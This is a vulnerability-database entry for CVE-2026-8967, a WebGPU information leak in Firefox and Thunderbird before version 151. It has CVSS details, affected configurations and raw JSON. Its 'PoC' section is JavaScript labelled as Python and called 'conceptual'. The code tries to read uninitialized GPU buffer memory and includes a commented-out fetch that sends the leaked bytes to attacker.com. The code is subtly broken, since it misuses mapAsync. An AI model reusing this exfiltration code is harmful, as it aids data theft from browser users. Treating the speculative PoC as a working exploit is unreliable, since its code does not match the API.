Security Vulnerability Report
中文
CVE-2026-8967 CVSS 7.5 HIGH

CVE-2026-8967

Published: 2026-05-19 14:16:53
Last Modified: 2026-05-20 17:57:45

Description

Information disclosure in the Graphics: WebGPU component. This vulnerability was fixed in Firefox 151 and Thunderbird 151.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 151
Mozilla Thunderbird < 151

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Conceptual Proof of Concept for CVE-2026-8967 // This script demonstrates how a malicious page might attempt to trigger the WebGPU info leak async function exploitWebGPU() { // Check if WebGPU is supported if (!navigator.gpu) { console.log("WebGPU is not supported on this browser."); return; } try { const adapter = await navigator.gpu.requestAdapter(); const device = await adapter.requestDevice(); // Create a buffer that might expose uninitialized memory due to the vulnerability const bufferSize = 1024; // Adjust based on specific vulnerability requirements const buffer = device.createBuffer({ size: bufferSize, usage: GPUBufferUsage.COPY_SRC | GPUBufferUsage.MAP_READ, mappedAtCreation: false // Do not initialize to trigger potential leak }); // In a vulnerable version, mapping the buffer might reveal data from previous operations // or other contexts due to improper sanitization. const mappedBuffer = await buffer.mapAsync(GPUMapMode.READ); const data = new Uint8Array(mappedBuffer); // Check if data contains non-zero values (indicating potential memory leak) let leakedData = []; for (let i = 0; i < data.length; i++) { if (data[i] !== 0) { leakedData.push(data[i]); } } if (leakedData.length > 0) { console.log("[+] Potential sensitive data leaked from memory:", leakedData); // Simulate exfiltration // fetch('https://attacker.com/exfil', { method: 'POST', body: JSON.stringify(leakedData) }); } else { console.log("[-] No data leaked. Patched or non-vulnerable environment."); } buffer.destroy(); } catch (error) { console.error("Error during WebGPU exploitation attempt:", error); } } // Execute the PoC exploitWebGPU();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8967", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:53.160", "lastModified": "2026-05-20T17:57:45.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Information disclosure in the Graphics: WebGPU component. This vulnerability was fixed in Firefox 151 and Thunderbird 151."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "151.0.0", "matchCriteriaId": "7C197B6D-C48E-4D7E-A1C0-52E081E97DF0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "151.0.0", "matchCriteriaId": "F6DF6D4E-CB51-4F9E-89A0-6097B9DBDB5C"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2027173", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-46/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-50/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}